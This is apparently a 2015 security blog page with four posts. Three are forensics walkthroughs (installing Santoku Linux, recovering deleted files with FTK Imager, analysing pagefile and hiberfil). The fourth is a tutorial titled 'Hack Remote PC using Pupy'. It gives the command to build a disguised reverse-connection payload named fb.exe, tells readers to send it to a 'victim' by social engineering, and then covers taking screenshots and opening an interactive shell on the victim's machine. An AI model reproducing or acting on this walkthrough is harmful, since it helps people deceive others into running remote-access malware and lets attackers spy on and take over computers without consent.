SANTOKU Linux- Overview of Mobile Forensics Operating System

at 4:11 AM Monday, October 5, 2015 0 comments
Santoku is dedicated to mobile forensics, analysis, and security, and packaged in an easy to use, Open Source platform.

First Download Santoku ISO image from here

After having started the Santoku boot loader, you will see a screen with several boot options. Now click on Install – start the installer directly then press Enter

You will see this screen, then click on Continue


Click Continue here as well


Select first option – Erase disk and install Santoku, then click on Install Now


Now you will see a Map which shows your location, and then click on Continue


You will see the form, please fill all the fields like Name, Password etc and then click Continue


You will get a Pop up on your computer screen says Installation Complete, please restart your Computer. Click on Restart Now


Once the computer is ready to use it will ask you for the login details. Please enter your password to login.


Now you are on the Home screen of SANTOKU, click on bottom left of your computer screen. You will get couple of options, please select SANTOKU and click on Development Tools; here you can find all available development tools in SANTOKU.


Click on Device Forensics, here you can find all available Device Forensics tools in SANTOKU


Click on Penetration Testing, here you can find all available Penetration Testing tools in SANTOKU.


Click on Reverse Engineering, here you can find all available Reverse Engineering tools in SANTOKU.


Click on Wireless Analyzers, here you can find all available Wireless Analyzers tools in SANTOKU.

Labels:

How to Recover Deleted from RAW Image using FTK Imager and Recover My File

at 12:57 AM Sunday, October 4, 2015 0 comments
How to create Disk Image read this article
 http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/


After installing the program, run it. In the window that shall appear, click on the option “File” and “Image Mounting.


Now select the image file to mount image to drive.


In the window “Mount Image to Drive”, choose the forensic image that shall be mounted and select
The Drive letter and click on mount option

Now it will show the mounted image as G:  Drive in your system.



Now, download Recover my file from here after installing, run the program. In the window let´s choose the option “Recover files” and click on next.


 In the next window l choose the option “In a specific location” and indicate the mounted drive  through FTK Imager. Now click on “Next”.


Now select search for deleted files option and click on start.


Now it will show all the deleted files, which are recovered and now select your desired deleted file and save in your pc.

Labels:

Forensics Analysis of Pagefile, hibersys File

at 9:25 AM Saturday, October 3, 2015 0 comments
In forensic investigation, Memory dump, pagefile and hiberfil files can provide us a lot of data. Memory dump is the file which contains the   information about the cause of the system crash.
From Forensics wiki
Pagefile.sys: Microsoft Windows uses a paging file, called pagefile.sys, to store frames of memory that do not current fit into physical memory. Although Windows supports up to 16 paging files, in practice normally only one is used.

Hiberfil.sys: hiberfil file stores the data when Microsoft windows computer system is on Hibernate mode.
These files are very useful for digital investigation because these files are not stored in physical Hard Disk.

First of all download Access Data FTK Imager from here so to capture the memory dump, click on capture memory option.


A new window will pop up. Click on browse button to select destination path. Select the option Include Pagefile & click on Capture Memory.




After completion of process, two files will be carved in the specified folder.


To Extract the Hiberfil  file, click on add all attached devices


 Now click on the directory where windows are installed.  Select Root Folder and click on hiberfil.sys file.


Now right click on Hiberfil file & click on Export files.


Select the folder



After process completion, it will show the message about exported file


Now to analyze the Live RAM image file, we will use Belkasoft Evidence Center.

Now open Belkasoft Evidence Center.  Click on New Option. Click ok.


Enter all the details as well as root folder. 


Now select the option Live RAM Image.


Now select the specified path to mount an image file. In File Name option select All Files (*) It will show the files.  Select Pagefile .sys.


Now select the option Analyze Data Source click on Next.


 To select the supported data types to curve, Click on Select All option and click on Finish.


To analyze visited URL. Click on Chrome Live Ram


Similarly Click on Opera Live Ram.


Click on Found Pictures to see the images.


Same method use for hibersys file
Labels:

Hack Remote PC using Pupy - Remote Administration Tool

at 9:58 AM Thursday, October 1, 2015 0 comments
Pupy is a remote administration tool with an embedded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. The payload is a reflective DLL and leaves no trace on disk.

·         On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
·         Pupy can reflectively migrate into other processes
·         Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
·         Modules are quite simple to write and pupy is easily extensible.
·         Pupy uses rpyc and a module can directly access python objects on the remote client
·         We can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works!
·         Communication channel currently works as a SSL reverse connection, but a bind payload will be implemented in the future
·         All the non interactive modules can be dispatched on multiple hosts in one command
·         Multi-platform (tested on Windows 7, Windows Xp, kali Linux, Ubuntu)
·         Modules can be executed as background jobs
·         Commands and scripts running on remote hosts are interruptible
·         Auto-completion and nice colored output :-)
·         Commands aliases can be defined in the config.


First Download pupy-master from here and unzip in your pc.


Now run pip install rpyc in your terminal.


No go to puppy folder and type the following command and generate the payload.

./pupygen.py 192.168.1.6 -p 443 -t exe_x86 -o fb.exe


After we successfully generate the malicious exe File, it will stored on your local computer now send your fb.exe files to victim using any social engineering technique.


No go to puppy folder and type the following command to set up a listener to handle reverse connection.

./pusysh.py

Now open pupy Shell. It will show the message session 1 opened.


Now type the command Sessions to see Active sessions. Type PS  command to see the running processes.


Type command List_ Modules to see all available modules.


Type run screenshot to save screenshots into an image file.


Now use  run interactive shell  command to get the control of the victim PC.

Labels: ,
Subscribe to: Posts (Atom)